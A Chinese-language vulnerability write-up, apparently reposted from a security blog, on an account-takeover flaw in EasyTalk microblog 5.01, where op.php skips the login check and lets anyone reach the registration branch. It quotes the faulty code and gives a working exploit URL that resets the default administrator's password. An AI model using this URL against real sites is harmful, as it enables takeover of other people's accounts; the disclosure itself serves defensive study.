原作者:心灵
漏洞发现在最新版本:5.01,旧版本没源码,不知是否存在。
还是那句话,看代码……
看文件:op.php:
include('common.inc.php'); //载入全局变量 |
这里简单得很,看下:“common.inc.php”。
主要代码: $prev=$_SERVER['HTTP_REFERER']; |
这里就是:“op.php?op=register”,载入的,看“op.php”那文件就知,简单得很……,还是那句,看代码。
以下是引用片段:
.... 前面是多余代码...省略 主要是检测登录状态 if ($act=="check") { //主要问题在这里...上面common.inc.php说了act是_GET的 如果act不等于check呢?那就不用检测了.............. if ($act=="reg") { //悲剧了....他真以为所有人都按照他脚本的路去走。。。 |
EXP: op.php?op=register&act=reg&uname=administrator&unick=admin&[email protected]&pass1=admin&pass2=admin “administrator”是默认管理员账号,当然可以修改其他。 |
文章来源于lcx.cc:EasyTalk 微博系统任意修改账户漏洞 - Exp
10.9 销毁信息 在大多数的计算机上删除一个文件时,该文件并不会真的被删除。删除掉的唯一东西就是磁盘索引文件中的入口,磁盘索引文件用来告诉机器磁盘上的数据在哪里。许多软件供应商不失时机的出售文件恢复软件,它们可以在文件被删除后将其恢复。 还有…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论